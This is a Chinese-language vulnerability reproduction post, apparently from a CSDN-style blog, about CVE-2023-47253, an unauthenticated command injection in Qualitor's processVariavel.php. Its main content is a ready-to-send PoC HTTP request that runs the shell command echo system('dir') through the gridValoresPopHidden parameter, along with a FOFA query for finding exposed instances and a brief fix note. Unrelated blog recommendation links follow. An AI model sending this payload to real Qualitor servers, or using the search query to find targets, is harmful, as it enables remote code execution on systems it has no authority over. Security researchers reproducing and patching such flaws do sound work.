Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)

0x01 漏洞概述

Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码。

0x02 复现环境

FOFA:app="Qualitor-Web"

0x03 漏洞复现

PoC

GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("dir"); HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

0x04 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
CertiK11 分钟前
Techub专访顾荣辉教授:解密CertiK的安全战略路线
安全·区块链·web3.0
程序员阿鹏2 小时前
HashMap为什么线程不安全?如何实现线程安全
java·开发语言·数据结构·安全·eclipse·intellij-idea
HHoao3 小时前
Java 安全认证和 Hadoop UGI 原理解析
java·hadoop·安全
衍生星球4 小时前
【网络安全】身份认证
网络·安全·web安全
LeslieChan_专业海外留学服务4 小时前
留学生如何适应海外生活以及应对文化差异
分布式·安全·microsoft·阿里云·全文检索·lucene
h177113472055 小时前
婚恋交友小程序的设计思路与用户体验优化
大数据·人工智能·安全·系统架构·交友
H_kiwi10 小时前
【解决】Mac 上 M系列芯片用 Vmware Fusion安装 win11 遇到的主要的问题汇总
linux·windows·学习·安全·ubuntu·macos·centos
马船长12 小时前
企望制造ERP系统存在RCE漏洞
安全·web安全·制造